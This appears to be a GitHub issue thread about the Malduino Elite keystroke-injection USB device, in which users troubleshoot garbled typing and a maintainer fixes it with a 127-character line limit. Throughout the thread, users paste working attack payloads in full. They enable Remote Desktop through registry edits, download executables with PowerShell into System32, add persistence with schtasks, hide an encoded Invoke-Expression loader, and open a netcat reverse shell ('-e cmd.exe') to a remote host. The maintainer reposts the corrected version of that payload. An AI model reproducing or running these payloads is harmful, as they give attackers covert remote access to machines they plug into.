Malduino Elite not entering in ENTER or some STRING lines properly

[ll3N1GmAll]

Most of my scripts are not functioning as they do on the bunny and ducky platforms. I am seeing duplicate string sections entered in where they dont exist in the script; and other keys, such as ENTER not being inserted properly. example: STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f DELAY 200 ENTER DELAY 3000 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f DELAY 200 ENTER DELAY 3000 STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe') DELAY 200 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe') DELAY 200 ENTER STRING %WINDIR%\System32\payload.exe -i -d -s /accepteula %WINDIR%\System32\payload2.exe DELAY 200 ENTER STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

This section should output the following in a notepad: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe') powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe') %WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\payload.exe schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

HOWEVER, this is what it outputs consistently: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDenyTSConnectionsreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fAllowToGetHelppowershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.ex powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2. %WINDIR%\System32\payload2.exe -i -d -s /accepteula %WINDIR%\System32\payload.exeschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

Some of this behavior seems similar to the bashbunny firmware bug that caused issues with strings that ended in .TXT. For some reason that threw the device into a bizarre fit. These oddities feel very similar to that type of thing.

[ll3N1GmAll]

Here is another example (actual payload text removed): GUI r DELAY 5000 STRING cmd DELAY 200 ENTER DELAY 5000 STRING if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();") DELAY 200 ENTER

This is the output: cmd if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamR ")

So, it types "cmd" then injects ENTER. Then it starts to type until it gets to ""Invoke-Expression $(New-Object IO.StreamR")". Then it goes back 2 spaces to the left of ") and the injects an ENTER which drops the ") down to the next line and the payload never progresses beyond this point.

I have a similar payload; but that opens up an admin prompt for an admin shell. It stops at the exact same place and performs the identical moving the cursor back 2 places and then injecting ENTER before the script stops entirely.

[Nibot1]

Please try to Split your STRING to multiple of them because the Maximum number of chars in a line are 256 Example: GUI r STRING cmd ENTER STRING Hello STRING My STRING Name STRING is ENTER

All of These Strings will be written in one line.

[ll3N1GmAll]

Thanks for your reply. I will take that limit into consideration when developing payloads; but since some text is being duplicated and the errors are occurring at less than 100 characters in I'm not sure that is related. I will do this and report back just to make sure though. Thanks again for your reply!

Please try to Split your STRING to multiple of them because the Maximum number of chars in a line are 256

-- Sent from my Android device with K-9 Mail. Please excuse my brevity.

[ll3N1GmAll]

The first payload has no lines near 256 characters and it is still behaving in the manner described in my first post. It is acting as though it is possessed. I'm thinking that there is some character or character combination that is causing it to respond in a buggy way like the bashbunny issue on firmwares <1.4 with strings that ended in .TXT

[Nibot1]

Pkease try to change the “#define buffersize 256” to “#define buffersize 128” and short your lines to 127 Chars per line.

[GreenSales]

This is the code i have: DELAY 1000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 500 ENTER DELAY 500 STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1 DELAY 500 ENTER DELAY 500 STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit ENTER

Notepad: cmd cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPoliy START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit

What should I do? Malduino doesen't write all letters...

[GreenSales]

@Nibot1 Can anyone here tell me why malduino sometimes writes the string ok and sometimes not?

[Nibot1]

@GreenSales You must place a STRING command in front of every line with the string wich should be typed Example: STRING hello STRING World Will get hello World written without an line break
And remember each line can only hold 127 chars including spaces

Try This Code DELAY 1000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 500 ENTER DELAY 500 STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 STRING & powershell -ExecutionPolicy ByPass -File b.ps1 DELAY 500 ENTER DELAY 500 STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit ENTER

[Nibot1]

Is this Issue solved ?

[GreenSales]

Well with that string yes.. But always aftar i startup my pc a script is written wrong.. And after i replug the usb everything is all right.. I can't see why that happens

[ll3N1GmAll]

I will try to implement your proposed fix and modifications to my payloads tonight and reply back with results. Thank you for your response.

[ll3N1GmAll]

Looking at my #define buffersize attribute it was already set to 128; but I didn't change it. I will reformat the payloads accordingly and report back. Thanks for your help!

[ll3N1GmAll]

With buffersize set at 128 and all lines set at 127 chars total or less is working. Thanks!

[Nibot1]

@ll3N1GmAll Is this issue solved ? If yes please close the issue.

[ll3N1GmAll]

Yes, this issue is resolved. I explained that in my response 13 days ago; but was not aware that I needed to close this (or even that I could close it). I apologize for my ignorance. I now see the "close and comment" button I overlooked last time. Closing now, thanks so much for your help. This has made my malduino everything I had hoped it would be! :)